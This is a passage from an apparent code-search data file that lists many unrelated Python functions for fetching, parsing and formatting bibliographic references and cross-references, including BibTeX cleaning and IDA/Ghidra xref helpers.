requests.get(f\"https://opencitations.net/index/api/v1/references/{doi}\").json()\n if response:\n references = [{\"doi\": r['cited'].replace(\"coci =>\", \"\")} for r in response]\n\n if references:\n return references\n else:\n return None", "def references(self) -> \"IterableList[Reference]\":\n return Reference.list_items(self)", "def References(self, default=[{}]):\n tmp = self.data.get('metadata', {}).get('references', default)\n return [HEP.ReferenceObject(i) for i in tmp]", "def getFileReferences():\n refNodes = pm.ls(rf=True)\n fileRefs = [r.referenceFile() for r in refNodes]\n return fileRefs", "def fetchReferences(self, dataRef, exposure):\n skyMap = dataRef.get(self.dataPrefix + \"skyMap\", immediate=True)\n tractInfo = skyMap[dataRef.dataId[\"tract\"]]\n patch = tuple(int(v) for v in dataRef.dataId[\"patch\"].split(\",\"))\n patchInfo = tractInfo.getPatchInfo(patch)\n references = lsst.afw.table.SourceCatalog(self.references.schema)\n references.extend(self.references.fetchInPatches(dataRef, patchList=[patchInfo]))\n return references", "def list_defect_refs(self):\n print('-----------\\nDEFECT_REFs\\n-----------')\n self._print_dict(self.defect_refs)", "def getListOfReferenceGlyphs(self, *args):\n return _libsbml.GeneralGlyph_getListOfReferenceGlyphs(self, *args)", "def get_references(self):\n return self._references", "def _refs(self, items):\n # type: (Iterable[Any]) -> Iterable[weakref.ReferenceType]\n return map(self.ref, items)", "def run(self):\n env = cast(\"BuildEnvironment\", self.state.document.settings.env)\n foot_old_refs = env.temp_data.setdefault(\"bibtex_foot_old_refs\", set())\n foot_new_refs = env.temp_data.setdefault(\"bibtex_foot_new_refs\", set())\n footbibliography_count = env.temp_data[\"bibtex_footbibliography_count\"] = (\n env.temp_data.get(\"bibtex_footbibliography_count\", 0) + 1\n )\n if not foot_new_refs:\n return []\n else:\n foot_old_refs |= foot_new_refs\n foot_new_refs.clear()\n # bibliography stored in env.temp_data[\"bibtex_foot_bibliography\"]\n foot_domain = cast(\"BibtexFootDomain\", env.get_domain(\"footcite\"))\n foot_bibliography, env.temp_data[\"bibtex_foot_bibliography\"] = (\n env.temp_data[\"bibtex_foot_bibliography\"],\n foot_domain.bibliography_header.deepcopy(),\n )\n domain = cast(\"BibtexDomain\", env.get_domain(\"cite\"))\n for bibfile in domain.bibdata.bibfiles:\n env.note_dependency(bibfile)\n foot_bibliography[\"ids\"] += _make_ids(\n docname=env.docname,\n lineno=self.lineno,\n ids=set(self.state.document.ids.keys()),\n raw_id=env.app.config.bibtex_footbibliography_id.format(\n footbibliography_count=footbibliography_count\n ),\n )\n self.state.document.note_explicit_target(\n foot_bibliography, foot_bibliography\n )\n return [foot_bibliography]", "def references(self):\n return tuple(self.__references)", "def list_refs(self):\n print('----\\nREFs\\n----')\n self._print_dict(self.refs)", "def get_refs(*args, **kwargs):\n return get_refs_async(*args, **kwargs).get_result()", "def extract_references(text):\n open = u\"\\u201C\"\n close = u\"\\u201D\"\n undir_quote_strs = re.findall(r'\\\"(.+?)\\\"',text.decode('UTF-8', errors = 'replace'))\n dir_quote_strs=re.findall(r''+open+'(.+?)'+close+'',text.decode('UTF-8',errors='replace'))\n if len(undir_quote_strs) > len(dir_quote_strs):\n return undir_quote_strs #Some documents use undirected quotes\n return dir_quote_strs # Some documents use directed quotes", "def list_defect_ref_keys(self):\n print('=======')\n print('DEFECT_REFs')\n print('=======')\n for key in self.defect_refs:\n print(key)", "def getReferencesTo(self, address: ghidra.program.model.address.Address) -> List[ghidra.program.model.symbol.Reference]:\n ...", "def RawRefs(self, default=[{}]):\n tmp = self.data.get('raw_refs', default)\n return [HEP.RawReferenceObject(i) for i in tmp]", "def find_reference_files():\n for root, _, files in os.walk(\"./tests/references/\"):\n for basename in fnmatch.filter(files, \"*.tex\"):\n yield os.path.join(root, basename)", "def getRefs(self, text):\n pattern = re.compile(r'(?:(?<=^)|(?<=\\s))\\[(.+)\\]((?:http(?:s?):\\/\\/|\\/)\\S+)(?=\\s|$)',\n re.U)\n text = pattern.sub(self.refs, text)\n return text", "def add_ref(doc_name, bib_name, keep_label=False, slides=False):\n bib_path = bib_name # os.path.join(static_path, \"tex\", bib_name)\n if not slides:\n keep_label = True\n with open(doc_name, \"r\") as f:\n _file = f.read()\n # find citations\n match = re.findall(r\"\\[@.*?\\]\", _file)\n references = []\n # print(match)\n for cit in match:\n tmp_cite_html = tempfile.NamedTemporaryFile(suffix=\".html\", delete=True)\n tmp = tempfile.NamedTemporaryFile(suffix=\".md\", delete=True)\n with open(tmp.name, \"w\") as md_file:\n # Open the file for writing.\n md_file.write(cit)\n\n pandoc_command = [\n \"pandoc\",\n \"-C\",\n tmp.name,\n \"--bibliography\",\n bib_path,\n \"--csl\",\n \"./templates/my-csl.csl\",\n \"-o\",\n tmp_cite_html.name,\n ]\n if not slides:\n for tag in [\"--metadata\", \"link-citations=true\"]:\n pandoc_command.append(tag)\n output = subprocess.check_output(\n pandoc_command, stderr=subprocess.STDOUT\n ).decode(\"utf-8\")\n print(output.rstrip())\n tmp.close()\n with open(tmp_cite_html.name, \"r\") as cite_html:\n # Open the file for writing.\n cit_new = cite_html.read()\n # print(cit_new)\n if not keep_label:\n # remove first line\n cit_new = \"\\n\".join(cit_new.splitlines()[1:])\n else:\n lines = cit_new.splitlines()\n # remove the <p> tags\n lines[0] = lines[0][3:-4]\n cit_new = \"\\n\".join(lines)\n if slides:\n _file = _file.replace(cit, cit_new)\n else:\n _file = _file.replace(cit, lines[0])\n # collect the references\n references.append(\"<p>\")\n references.append(\"\\n\".join(lines))\n references.append(\"</p>\")\n # paste_refs_end()\n tmp_cite_html.close()\n if slides:\n with open(doc_name, \"w\") as f:\n f.write(_file)\n if not slides:\n if references == []:\n _file=clean_html_refs(_file)\n else:\n _file = _file.replace(\"<bibliography-placeholder>\", \"\\n\".join(references))\n with open(doc_name, \"w\") as f:\n f.write(_file)\n return", "def get_refs(self): \n for row in self._get_references_node():\n yield row.fetch_all_fields()", "def fetch_citylink_refs(self):\n tree = html.fromstring(self.fetch_manifest())\n self_refs = tree.xpath('//table/tr/td/table/tr[position()>4]/td[1]/text()')\n return [x.strip() for x in self_refs[:-1]]", "def retrieve(dbxrefs, basics=True, hierarchy=True, wikipedia=True, literature=True, cross_references=True, overlaps=True):\n resolved = dbxref.resolver.resolve(dbxrefs, check_existence=False)\n documents = []\n for entry in resolved:\n # Construct URL for retrieve\n json_url = entry['locations']['json'][0]\n logger.debug('URL: %s', json_url)\n r = requests.get(json_url)\n logger.debug('Content: %s', r.text)\n ipro = json.loads(r.text)\n\n # Parse retrieved json file by selected Options\n output = {\"id\": entry[\"dbxref\"]}\n if basics:\n try:\n output.update(accession=ipro[\"metadata\"][\"accession\"], entry_type=ipro[\"metadata\"][\"type\"],\n description=ipro[\"metadata\"][\"description\"], counters=ipro[\"metadata\"][\"counters\"],\n entry_id=ipro[\"metadata\"][\"entry_id\"], name=ipro[\"metadata\"][\"name\"],\n source_database=ipro[\"metadata\"][\"source_database\"])\n except KeyError:\n logger.warning(\"One or more basic information were not available for the given entry. Please check your output.\")\n if hierarchy:\n try:\n output.update(hierarchy=ipro[\"metadata\"][\"hierarchy\"])\n except KeyError:\n logger.warning(\"Hierarchy information was not available for the given entry.\")\n if wikipedia:\n try:\n output.update(wikipedia=ipro[\"metadata\"][\"wikipedia\"])\n except KeyError:\n logger.warning(\"Wikipedia articles were not available for the given entry.\")\n if literature:\n try:\n output.update(literature=ipro[\"metadata\"][\"literature\"])\n except KeyError:\n logger.warning(\"Literature was not available for the given entry.\")\n if cross_references:\n try:\n output.update(cross_references=ipro[\"metadata\"][\"cross_references\"])\n except KeyError:\n logger.warning(\"Cross_references were not available for the given entry.\")\n if overlaps:\n try:\n output.update(overlaps=ipro[\"metadata\"][\"overlaps_with\"])\n except KeyError:\n logger.warning(\"Overlap information was not available for the given entry.\")\n documents.append(output)\n return documents", "def _FindBibEntries(self):\n bibs = \" \".join(glob.glob(\"*.bib\"))\n cat_process = subprocess.Popen(shlex.split(\"cat %s\" % bibs),\n stdout=subprocess.PIPE)\n grep_process = subprocess.Popen(shlex.split(\"grep ^@\"),\n stdin=cat_process.stdout,\n stdout=subprocess.PIPE)\n cat_process.stdout.close()\n grep2_process = subprocess.Popen(shlex.split(\"grep -vi @string\"),\n stdin=grep_process.stdout,\n stdout=subprocess.PIPE)\n grep_process.stdout.close()\n\n lines = grep2_process.communicate()[0]\n\n ret = []\n for l in lines.split(\"\\n\"):\n ret.append(responses.BuildCompletionData(\n re.sub(r\"@([A-Za-z]*)\\s*{\\s*([^,]*),.*\", r\"\\2\", l)\n )\n )\n return ret", "def refs(self):\n return self._refs", "def to_cff_reference(bib_entry: pybtex.database.Entry) -> dict:\n\n def _cff_transform(cff_field, bib_value):\n if cff_field == \"type\":\n if bib_value == \"inproceedings\":\n return \"article\"\n elif bib_value == \"incollection\":\n return \"article\"\n elif cff_field == \"publisher\":\n return {\"name\": bib_value}\n elif cff_field == \"month\":\n try:\n return int(bib_value)\n except ValueError:\n return {\n \"jan\": 1,\n \"feb\": 2,\n \"mar\": 3,\n \"apr\": 4,\n \"may\": 5,\n \"jun\": 6,\n \"jul\": 7,\n \"aug\": 8,\n \"sep\": 9,\n \"oct\": 10,\n \"nov\": 11,\n \"dec\": 12,\n }[bib_value[:3].lower()]\n return bib_value\n\n cff_reference = {\n \"type\": _cff_transform(cff_field=\"type\", bib_value=bib_entry.type),\n \"authors\": [\n to_cff_person(person) for person in bib_entry.persons[\"author\"]\n ],\n }\n # Map BibTeX to CFF fields. This is just a subset of the most relevant\n # fields.\n fields = {\n \"doi\": \"doi\",\n \"edition\": \"edition\",\n \"isbn\": \"isbn\",\n \"license\": \"license\",\n \"month\": \"month\",\n \"number\": \"number\",\n \"pages\": \"pages\",\n \"publisher\": \"publisher\",\n \"title\": \"title\",\n \"url\": \"url\",\n \"version\": \"version\",\n \"volume\": \"volume\",\n \"year\": \"year\",\n \"booktitle\": \"collection-title\",\n }\n for bibtex_field, value in bib_entry.fields.items():\n bibtex_field = bibtex_field.lower()\n if bibtex_field in fields:\n cff_field = fields[bibtex_field]\n cff_reference[cff_field] = _cff_transform(\n cff_field=cff_field, bib_value=value\n )\n return cff_reference", "def getRefs( self, par, path ):\n\n return self.db.getRefsPar( par, path )", "def extract_references_from_txt(filename):\n file = open(filename)\n references_section = \"\"\n references_section_found = False\n for line in file:\n if \"REFERENCE\" in line:\n references_section_found = True\n if references_section_found:\n references_section+=line + \" \"\n references_section = references_section.replace('\\n','')\n refs = extract_references(references_section)\n return refs", "def getReferenceAnalyses(self):\n return [analysis for analysis in self.getAnalyses() \\\n if analysis.portal_type=='ReferenceAnalysis']", "def getXRefsTo(self):\r\n # type: () -> (list[int], list[int])\r\n crefs = []\r\n drefs = []\r\n # If the current address is function process it\r\n if idc.get_func_flags(self.func_ea) != -1:\r\n # Find all code references to func\r\n ref = idc.get_first_cref_to(self.func_ea)\r\n while ref != idaapi.BADADDR:\r\n # name = get_func_name(ref)\r\n # if not name: name = \"ROM:%08X\" % ref\r\n crefs.append(ref)\r\n ref = idaapi.get_next_cref_to(self.func_ea, ref)\r\n # Find all data references to func\r\n for ref in idautils.DataRefsTo(self.func_ea):\r\n drefs.append(ref)\r\n for ref in idautils.DataRefsTo(self.func_ea + 1):\r\n drefs.append(ref)\r\n\r\n return crefs, drefs", "def function_refs(self) -> List[FunctionReference]:\n return self._function_refs", "def list_all_refs(self):\n self.list_refs()\n self.list_ref0s()\n self.list_defect_refs()", "def get_crefs_from( ea ):\r\n\tret = []\r\n\txrf = get_first_cref_from( ea )\r\n\tif xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_cref_from( ea, xrf )\r\n\twhile xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_cref_from( ea, xrf )\r\n\treturn ret", "def process_and_dispatch(self):\n references = []\n for raw_block_references in self.raw_references:\n bibcode = raw_block_references['bibcode']\n block_references = raw_block_references['block_references']\n item_nums = raw_block_references.get('item_nums', [])\n\n parsed_references = []\n for i, reference in enumerate(block_references):\n reference = self.latex_reference.cleanup(reference)\n logger.debug(\"confTEX: parsing %s\" % reference)\n parsed_references.append(self.merge({'refstr': reference, 'refraw': reference}, self.any_item_num(item_nums, i)))\n\n references.append({'bibcode': bibcode, 'references': parsed_references})\n logger.debug(\"%s: parsed %d references\" % (bibcode, len(references)))\n\n return references", "def split_bibitems(bibliography):\n \n refs = []\n for filename, bib in bibliography.iteritems():\n split_ind = []\n for ind, item in enumerate(bib):\n if item.startswith(r\"\\bibitem\"):\n split_ind.append(ind)\n \n for ref in partition(bib, split_ind):\n if ref:\n refs.append(RefObj.RefObj(filename, refstr='\\n'.join(ref)))\n return refs", "def references(name, tag):\n\n gen_refs = \"\\n\".join([''.join([\"J. Bartels, The technique of scaling \",\n \"indices K and Q of geomagnetic activity, \",\n \"Ann. Intern. Geophys. Year 4, 215-226, \",\n \"1957.\"]),\n ''.join([\"J. Bartels,The geomagnetic measures for \",\n \"the time-variations of solar corpuscular \",\n \"radiation, described for use in \",\n \"correlation studies in other geophysical \",\n \"fields, Ann. Intern. Geophys. Year 4, \",\n \"227-236, 1957.\"]),\n ''.join([\"P.N. Mayaud, Derivation, Meaning and Use \",\n \"of Geomagnetic Indices, Geophysical \",\n \"Monograph 22, Am. Geophys. Union, \",\n \"Washington D.C., 1980.\"]),\n ''.join([\"G.K. Rangarajan, Indices of magnetic \",\n \"activity, in Geomagnetism, edited by I.A. \",\n \"Jacobs, Academic, San Diego, 1989.\"]),\n ''.join([\"M. Menvielle and A. Berthelier, The \",\n \"K-derived planetary indices: description \",\n \"and availability, Rev. Geophys. 29, 3, \",\n \"415-432, 1991.\"])])\n refs = {'kp': {'': gen_refs, 'forecast': gen_refs, 'recent': gen_refs}}\n\n return refs[name][tag]", "def process_bibliography(style, reference_list):\n processed_bibliography = Element(\"ol\", attrib={\"class\":\"bibliography\"})\n\n for reference in reference_list:\n ref = SubElement(processed_bibliography, \"li\", \n attrib={\"property\":\"dc:references\"})\n\n for style_node in style.bibliography.layout:\n process_node(ref, style_node, style.macros, reference) \n\n return(processed_bibliography)", "def getBibTeX(bibref,tag_suf,outFile):\n if bibref == '1988iras....1.....B':\n bibtex = ['>@article{1988iras....1.....B,\\n',\n ' title={Infrared astronomical satellite (IRAS) catalogs and atlases. Volume 1: Explanatory supplement},\\n',\n ' keywords = {All Sky Photography, Catalogs, Indexes (Documentation), Infrared Astronomy Satellite, Cosmology, Galaxies, Star Formation, Stellar Evolution, Astrophysics},\\n',\n ' author={Beichman, CA and Neugebauer, G and Habing, HJ and Clegg, PE and Chester, Thomas J},\\n',\n ' year=1988,\\n',\n ' volume = {1},\\n', \n ' month = jan,\\n', \n ' adsurl = {https://ui.adsabs.harvard.edu/abs/1988iras....1.....B},\\n'\n '}\\n']\n else:\n baseURL = 'https://ui.adsabs.harvard.edu/abs/'\n suf = '/exportcitation'\n lines = urllib.request.urlopen(baseURL+bibref+suf).readlines()\n lines = [l.decode('utf-8') for l in lines] # remove additional webpage encoding\n \n bibtex = []\n for l in range(0, len(lines)):\n if 'export-textarea ' in str(lines[l]):\n bibtex.append(str(lines[l]))\n t = l+1\n \n while '</textarea>' not in str(lines[t+1]):\n bibtex.append(str(lines[t])) \n t += 1\n \n for item in bibtex:\n if 'author' in item.split('=')[0]:\n auth = item.split('=')[1].split(',')[0]\n for i in string.punctuation:\n auth = auth.replace(i, '')\n auth = auth.replace(' ', '')\n if 'year' in item.split('=')[0]:\n yr = item.split('=')[1].split(',')[0]\n yr = yr.replace(' ', '')\n \n try:\n bibtex[0] = bibtex[0].split('>')[1].split('{')[0]+'{'+auth+yr+tag_suf+',\\n'\n except UnboundLocalError as ule:\n print(bibtex)\n print('')\n print(ule)\n sys.exit()\n \n with open(outFile, 'a') as o:\n for item in bibtex:\n item = item.replace('&#34;', '\"')\n item = item.replace('&#39;', \"'\")\n item = item.replace('&amp;', \"&\")\n o.write(item)\n o.write('\\n')\n \n return auth+yr+tag_suf", "def main(bib_fpath=None):\n\n if bib_fpath is None:\n bib_fpath = 'My Library.bib'\n\n # DEBUG = ub.argflag('--debug')\n # Read in text and ensure ascii format\n dirty_text = ut.readfrom(bib_fpath)\n\n from fixtex.fix_tex import find_used_citations, testdata_fpaths\n\n if exists('custom_extra.bib'):\n extra_parser = bparser.BibTexParser(ignore_nonstandard_types=False)\n parser = bparser.BibTexParser()\n ut.delete_keys(parser.alt_dict, ['url', 'urls'])\n print('Parsing extra bibtex file')\n extra_text = ut.readfrom('custom_extra.bib')\n extra_database = extra_parser.parse(extra_text, partial=False)\n print('Finished parsing extra')\n extra_dict = extra_database.get_entry_dict()\n else:\n extra_dict = None\n\n #udata = dirty_text.decode(\"utf-8\")\n #dirty_text = udata.encode(\"ascii\", \"ignore\")\n #dirty_text = udata\n\n # parser = bparser.BibTexParser()\n # bib_database = parser.parse(dirty_text)\n # d = bib_database.get_entry_dict()\n\n print('BIBTEXPARSER LOAD')\n parser = bparser.BibTexParser(ignore_nonstandard_types=False,\n common_strings=True)\n ut.delete_keys(parser.alt_dict, ['url', 'urls'])\n print('Parsing bibtex file')\n bib_database = parser.parse(dirty_text, partial=False)\n print('Finished parsing')\n\n bibtex_dict = bib_database.get_entry_dict()\n old_keys = list(bibtex_dict.keys())\n new_keys = []\n for key in ub.ProgIter(old_keys, label='fixing keys'):\n new_key = key\n new_key = new_key.replace(':', '')\n new_key = new_key.replace('-', '_')\n new_key = re.sub('__*', '_', new_key)\n new_keys.append(new_key)\n\n # assert len(ut.find_duplicate_items(new_keys)) == 0, 'new keys created conflict'\n assert len(ub.find_duplicates(new_keys)) == 0, 'new keys created conflict'\n\n for key, new_key in zip(old_keys, new_keys):\n if key != new_key:\n entry = bibtex_dict[key]\n entry['ID'] = new_key\n bibtex_dict[new_key] = entry\n del bibtex_dict[key]\n\n # The bibtext is now clean. Print it to stdout\n #print(clean_text)\n verbose = None\n if verbose is None:\n verbose = 1\n\n # Find citations from the tex documents\n key_list = None\n if key_list is None:\n cacher = ub.Cacher('texcite1', enabled=0)\n data = cacher.tryload()\n if data is None:\n fpaths = testdata_fpaths()\n key_list, inverse = find_used_citations(fpaths, return_inverse=True)\n # ignore = ['JP', '?', 'hendrick']\n # for item in ignore:\n # try:\n # key_list.remove(item)\n # except ValueError:\n # pass\n if verbose:\n print('Found %d citations used in the document' % (len(key_list),))\n data = key_list, inverse\n cacher.save(data)\n key_list, inverse = data\n\n # else:\n # key_list = None\n\n unknown_pubkeys = []\n debug_author = ub.argval('--debug-author', default=None)\n # ./fix_bib.py --debug_author=Kappes\n\n if verbose:\n print('Fixing %d/%d bibtex entries' % (len(key_list), len(bibtex_dict)))\n\n # debug = True\n debug = False\n if debug_author is not None:\n debug = False\n\n known_keys = list(bibtex_dict.keys())\n missing_keys = set(key_list) - set(known_keys)\n if extra_dict is not None:\n missing_keys.difference_update(set(extra_dict.keys()))\n\n if missing_keys:\n print('The library is missing keys found in tex files %s' % (\n ub.repr2(missing_keys),))\n\n # Search for possible typos:\n candidate_typos = {}\n sedlines = []\n for key in missing_keys:\n candidates = ut.closet_words(key, known_keys, num=3, subset=True)\n if len(candidates) > 1:\n top = candidates[0]\n if ut.edit_distance(key, top) == 1:\n # \"sed -i -e 's/{}/{}/g' *.tex\".format(key, top)\n import os\n replpaths = ' '.join([relpath(p, os.getcwd()) for p in inverse[key]])\n sedlines.append(\"sed -i -e 's/{}/{}/g' {}\".format(key, top, replpaths))\n candidate_typos[key] = candidates\n print('Cannot find key = %r' % (key,))\n print('Did you mean? %r' % (candidates,))\n\n print('Quick fixes')\n print('\\n'.join(sedlines))\n\n # group by file\n just = max([0] + list(map(len, missing_keys)))\n missing_fpaths = [inverse[key] for key in missing_keys]\n for fpath in sorted(set(ub.flatten(missing_fpaths))):\n # ut.fix_embed_globals()\n subkeys = [k for k in missing_keys if fpath in inverse[k]]\n print('')\n ut.cprint('--- Missing Keys ---', 'blue')\n ut.cprint('fpath = %r' % (fpath,), 'blue')\n ut.cprint('{} | {}'.format('Missing'.ljust(just), 'Did you mean?'), 'blue')\n for key in subkeys:\n print('{} | {}'.format(\n ut.highlight_text(key.ljust(just), 'red'),\n ' '.join(candidate_typos[key]))\n )\n\n # for key in list(bibtex_dict.keys()):\n\n if extra_dict is not None:\n # Extra database takes precidence over regular\n key_list = list(ut.unique(key_list + list(extra_dict.keys())))\n for k, v in extra_dict.items():\n bibtex_dict[k] = v\n\n full = ub.argflag('--full')\n\n for key in key_list:\n try:\n entry = bibtex_dict[key]\n except KeyError:\n continue\n self = BibTexCleaner(key, entry, full=full)\n\n if debug_author is not None:\n debug = debug_author in entry.get('author', '')\n\n if debug:\n ut.cprint(' --- ENTRY ---', 'yellow')\n print(ub.repr2(entry, nl=1))\n\n entry = self.fix()\n # self.clip_abstract()\n # self.shorten_keys()\n # self.fix_authors()\n # self.fix_year()\n # old_pubval = self.fix_pubkey()\n # if old_pubval:\n # unknown_pubkeys.append(old_pubval)\n # self.fix_arxiv()\n # self.fix_general()\n # self.fix_paper_types()\n\n if debug:\n print(ub.repr2(entry, nl=1))\n ut.cprint(' --- END ENTRY ---', 'yellow')\n bibtex_dict[key] = entry\n\n unwanted_keys = set(bibtex_dict.keys()) - set(key_list)\n if verbose:\n print('Removing unwanted %d entries' % (len(unwanted_keys)))\n ut.delete_dict_keys(bibtex_dict, unwanted_keys)\n\n if 0:\n d1 = bibtex_dict.copy()\n full = True\n for key, entry in d1.items():\n self = BibTexCleaner(key, entry, full=full)\n pub = self.publication()\n if pub is None:\n print(self.entry['ENTRYTYPE'])\n\n old = self.fix_pubkey()\n x1 = self._pubval()\n x2 = self.standard_pubval(full=full)\n # if x2 is not None and len(x2) > 5:\n # print(ub.repr2(self.entry))\n\n if x1 != x2:\n print('x2 = %r' % (x2,))\n print('x1 = %r' % (x1,))\n print(ub.repr2(self.entry))\n\n # if 'CVPR' in self.entry.get('booktitle', ''):\n # if 'CVPR' != self.entry.get('booktitle', ''):\n # break\n if old:\n print('old = %r' % (old,))\n d1[key] = self.entry\n\n if full:\n d1 = bibtex_dict.copy()\n\n import numpy as np\n import pandas as pd\n df = pd.DataFrame.from_dict(d1, orient='index')\n\n paged_items = df[~pd.isnull(df['pub_accro'])]\n has_pages = ~pd.isnull(paged_items['pages'])\n print('have pages {} / {}'.format(has_pages.sum(), len(has_pages)))\n print(ub.repr2(paged_items[~has_pages]['title'].values.tolist()))\n\n entrytypes = dict(list(df.groupby('pub_type')))\n if False:\n # entrytypes['misc']\n g = entrytypes['online']\n g = g[g.columns[~np.all(pd.isnull(g), axis=0)]]\n\n entrytypes['book']\n entrytypes['thesis']\n g = entrytypes['article']\n g = entrytypes['incollection']\n g = entrytypes['conference']\n\n def lookup_pub(e):\n if e == 'article':\n return 'journal', 'journal'\n elif e == 'incollection':\n return 'booksection', 'booktitle'\n elif e == 'conference':\n return 'conference', 'booktitle'\n return None, None\n\n for e, g in entrytypes.items():\n print('e = %r' % (e,))\n g = g[g.columns[~np.all(pd.isnull(g), axis=0)]]\n if 'pub_full' in g.columns:\n place_title = g['pub_full'].tolist()\n print(ub.repr2(ub.dict_hist(place_title)))\n else:\n print('Unknown publications')\n\n if 'report' in entrytypes:\n g = entrytypes['report']\n missing = g[pd.isnull(g['title'])]\n if len(missing):\n print('Missing Title')\n print(ub.repr2(missing[['title', 'author']].values.tolist()))\n\n if 'journal' in entrytypes:\n g = entrytypes['journal']\n g = g[g.columns[~np.all(pd.isnull(g), axis=0)]]\n\n missing = g[pd.isnull(g['journal'])]\n if len(missing):\n print('Missing Journal')\n print(ub.repr2(missing[['title', 'author']].values.tolist()))\n\n if 'conference' in entrytypes:\n g = entrytypes['conference']\n g = g[g.columns[~np.all(pd.isnull(g), axis=0)]]\n\n missing = g[pd.isnull(g['booktitle'])]\n if len(missing):\n print('Missing Booktitle')\n print(ub.repr2(missing[['title', 'author']].values.tolist()))\n\n if 'incollection' in entrytypes:\n g = entrytypes['incollection']\n g = g[g.columns[~np.all(pd.isnull(g), axis=0)]]\n\n missing = g[pd.isnull(g['booktitle'])]\n if len(missing):\n print('Missing Booktitle')\n print(ub.repr2(missing[['title', 'author']].values.tolist()))\n\n if 'thesis' in entrytypes:\n g = entrytypes['thesis']\n g = g[g.columns[~np.all(pd.isnull(g), axis=0)]]\n missing = g[pd.isnull(g['institution'])]\n if len(missing):\n print('Missing Institution')\n print(ub.repr2(missing[['title', 'author']].values.tolist()))\n\n # import utool\n # utool.embed()\n\n # Overwrite BibDatabase structure\n bib_database._entries_dict = bibtex_dict\n bib_database.entries = list(bibtex_dict.values())\n\n #conftitle_to_types_set_hist = {key: set(val) for key, val in conftitle_to_types_hist.items()}\n #print(ub.repr2(conftitle_to_types_set_hist))\n\n print('Unknown conference keys:')\n print(ub.repr2(sorted(unknown_pubkeys)))\n print('len(unknown_pubkeys) = %r' % (len(unknown_pubkeys),))\n\n writer = BibTexWriter()\n writer.contents = ['comments', 'entries']\n writer.indent = ' '\n writer.order_entries_by = ('type', 'author', 'year')\n\n new_bibtex_str = bibtexparser.dumps(bib_database, writer)\n\n # Need to check\n #jegou_aggregating_2012\n\n # Fix the Journal Abreviations\n # References:\n # https://www.ieee.org/documents/trans_journal_names.pdf\n\n # Write out clean bibfile in ascii format\n clean_bib_fpath = ub.augpath(bib_fpath.replace(' ', '_'), suffix='_clean')\n\n if not ub.argflag('--dryrun'):\n ut.writeto(clean_bib_fpath, new_bibtex_str)", "def construct_bibfile_data(*paths):\n bibs = [reffile_factory(path) for path in paths]\n return bibs", "def load_references(self, collections, item):", "def pdflookup(pdf, allresults, outformat):\n txt = convert_pdf_to_txt(pdf)\n # remove all non alphanumeric characters\n txt = re.sub(\"\\W\", \" \", txt)\n words = txt.strip().split()[:20]\n gsquery = \" \".join(words)\n bibtexlist = query(gsquery, outformat, allresults)\n return bibtexlist", "def get_crefs_to( ea ):\r\n\tret = []\r\n\txrf = get_first_cref_to( ea )\r\n\tif xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_cref_to( ea, xrf )\r\n\twhile xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_cref_to( ea, xrf )\r\n\treturn ret", "def get_all_refobjs(self, ):\n return cmds.ls(type=\"jb_reftrack\")", "def __get_references(self):\n named_references = []\n for usage in self.xml_cache.get_xml_tree(\"usagemodel\"):\n variable_usages = usage.findall(\".//namedReference__VariableUsage\")\n for name in variable_usages:\n named_references.append(name.get(\"referenceName\"))\n return named_references", "def bibtex(self) -> str:\n a = BibDatabase()\n a.entries = [self.bib]\n return bibtexparser.dumps(a)", "def parse_references(article):\n reference_list = []\n references = article.find(\"text\").find(\"div\", attrs={\"type\": \"references\"})\n references = references.find_all(\"biblstruct\") if references is not None else []\n reference_list = []\n for reference in references:\n title = reference.find(\"title\", attrs={\"level\": \"a\"})\n if title is None:\n title = reference.find(\"title\", attrs={\"level\": \"m\"})\n title = title.text if title is not None else \"\"\n journal = reference.find(\"title\", attrs={\"level\": \"j\"})\n journal = journal.text if journal is not None else \"\"\n if journal is \"\":\n journal = reference.find(\"publisher\")\n journal = journal.text if journal is not None else \"\"\n year = reference.find(\"date\")\n year = year.attrs.get(\"when\") if year is not None else \"\"\n authors = []\n for author in reference.find_all(\"author\"):\n firstname = author.find(\"forename\", {\"type\": \"first\"})\n firstname = firstname.text.strip() if firstname is not None else \"\"\n middlename = author.find(\"forename\", {\"type\": \"middle\"})\n middlename = middlename.text.strip() if middlename is not None else \"\"\n lastname = author.find(\"surname\")\n lastname = lastname.text.strip() if lastname is not None else \"\"\n if middlename is not \"\":\n authors.append(firstname + \" \" + middlename + \" \" + lastname)\n else:\n authors.append(firstname + \" \" + lastname)\n authors = \"; \".join(authors)\n reference_list.append(\n {\"title\": title, \"journal\": journal, \"year\": year, \"authors\": authors}\n )\n return reference_list", "def external_array_references(self):\n return self._to_ears(self.fileuris)", "def getreferences(self, pmcid, source):\n import requests\n r = requests.get(\n (self.referencesurl).format(source=source, pmcid=pmcid))\n return r.content", "def getReferencesFrom(self, address: ghidra.program.model.address.Address) -> List[ghidra.program.model.symbol.Reference]:\n ...", "def make_crossref_fundref(dataset: ObservatoryDataset) -> List[Dict]:\n\n records = []\n\n for funder in dataset.funders:\n records.append(\n {\n \"pre_label\": funder.name,\n \"funder\": f\"http://dx.doi.org/{funder.doi}\",\n \"country_code\": funder.country_code,\n \"region\": funder.region,\n \"funding_body_type\": funder.funding_body_type,\n \"funding_body_sub_type\": funder.funding_body_subtype,\n }\n )\n\n return records", "def _extract_core_biblio(self, bib):\n try:\n pubnumber = bib_scalar(bib, 'pubnumber')\n pubdate = datetime.strptime(bib_scalar(bib, 'pubdate'), '%Y%m%d')\n fam_raw = bib_scalar(bib, 'family_id')\n family_id = int(fam_raw) if fam_raw != None else fam_raw\n assign_applic_raw = bib.get('assign_applic')\n assign_applic = '|'.join(assign_applic_raw) if len(assign_applic_raw) > 0 else \"\"\n except KeyError, exc:\n raise RuntimeError(\"Document is missing mandatory biblio field (KeyError: {})\".format(exc))\n if len(pubnumber) == 0:\n raise RuntimeError(\"Document publication number field is empty\")\n\n return family_id, pubdate, pubnumber, assign_applic", "def make_bibtex(self):\n\n\t\t# bib = requests.request('GET', 'http://dx.doi.org/' + self.doi, ", "def get(self, *args):\n return _libsbml.ListOfSpeciesReferences_get(self, *args)", "def get(self, *args):\n return _libsbml.ListOfReferenceGlyphs_get(self, *args)", "def find_link_references(bytecode, full_reference_names):\n unprefixed_bytecode = remove_0x_prefix(bytecode)\n\n expand_fn = functools.partial(\n expand_shortened_reference_name,\n full_reference_names=full_reference_names,\n )\n\n link_references = tuple((\n LinkReference(\n reference_name=remove_dunderscore_wrapper(match.group()),\n 